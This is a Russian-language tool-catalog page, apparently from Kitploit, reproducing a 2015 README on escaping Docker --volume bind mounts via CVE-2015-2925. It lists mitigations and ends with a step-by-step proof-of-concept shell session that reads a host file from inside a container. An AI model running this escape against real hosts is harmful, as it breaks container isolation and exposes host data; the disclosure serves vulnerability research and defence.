Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
docker_cve-2015-2925 — Docker + CVE-2015-2925 = escaping from --volume | Kitploit
Инструменты/GitHubGitHub/kagami/docker_cve-2015-2925
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingContainer Escape
GitHubkagami/docker_cve-2015-2925

docker_cve-2015-2925

Docker + CVE-2015-2925 = escaping from --volume

Репозиторий
11211 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Docker + CVE-2015-2925 = выход из --volume

Недавняя уязвимость в Linux, известная около полугода (несколько месяцев публично), сделала возможным выход из bind-монтирований. В частности, в случае Docker это позволяет выйти изнутри каталога, смонтированного с помощью опции --volume, в соответствующую файловую систему хоста.

Команда безопасности Docker уже знает о проблеме и разрешила опубликовать это для привлечения общественного внимания.

Спасибо Jann Horn за указание на это; в основном я просто воспроизвел это.

Смягчение

Любого из следующего будет достаточно:

  • Ядро с включенным AppArmor и профиль Docker для AppArmor
  • Ядро с включенным SELinux и политика Docker для SELinux
  • Отключенные пространства имен пользователей в ядре

Примечания

  • Это не исправлено в upstream и дистрибутивах на данный момент и должно работать на любом современном ядре
  • Для этого не требуются права root внутри контейнера
  • Дистрибутивы предоставляют разные версии пакета util-linux, частью которого является unshare(1), и в вашем случае он может вернуть "Operation not permitted"; пакет из Debian Jessie был протестирован и работает как ожидалось

Доказательство концепции

root@kitploit:~
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
Скачать инструмент